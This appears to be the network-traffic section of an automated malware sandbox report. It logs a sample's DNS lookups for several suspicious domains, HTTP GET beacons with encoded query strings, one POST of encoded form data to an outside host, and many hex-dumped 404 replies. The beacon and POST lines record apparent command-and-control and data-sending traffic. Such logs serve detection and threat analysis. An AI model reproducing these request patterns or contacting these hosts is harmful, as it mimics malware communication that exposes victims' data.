    GET /nxfn/?H0QP6=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x&OXVx9=WNjT HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.languagemodel.pro
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected:
    GET /3bdq/?H0QP6=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&OXVx9=WNjT HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.kexweb.top
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | DNS traffic detected: DNS query: www.woshop.online
Source: global traffic | DNS traffic detected: DNS query: www.kxshopmr.store
Source: global traffic | DNS traffic detected: DNS query: www.elsupertodo.net
Source: global traffic | DNS traffic detected: DNS query: www.omexai.info
Source: global traffic | DNS traffic detected: DNS query: www.tekilla.wtf
Source: global traffic | DNS traffic detected: DNS query: www.bola88site.one
Source: global traffic | DNS traffic detected: DNS query: www.languagemodel.pro
Source: global traffic | DNS traffic detected: DNS query: www.kexweb.top
Source: unknown | HTTP traffic detected:
    POST /7xi5/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Host: www.omexai.info
    Origin: http://www.omexai.info
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 218
    Connection: close
    Cache-Control: max-age=0
    Referer: http://www.omexai.info/7xi5/
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
    Data Ascii: H0QP6=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5xGkc/3GJfPkGwQRh191kkOmfaoEZDzY0Sblj/5KrWnoshQ+OA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 22 Sep 2024 15:35:48 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 22 Sep 2024 15:35:50 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 22 Sep 2024 15:35:53 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 22 Sep 2024 15:35:56 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 22 Sep 2024 15:36:02 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 22 Sep 2024 15:36:04 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 22 Sep 2024 15:36:07 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 22 Sep 2024 15:36:09 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:36:29 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:36:31 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:36:34 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
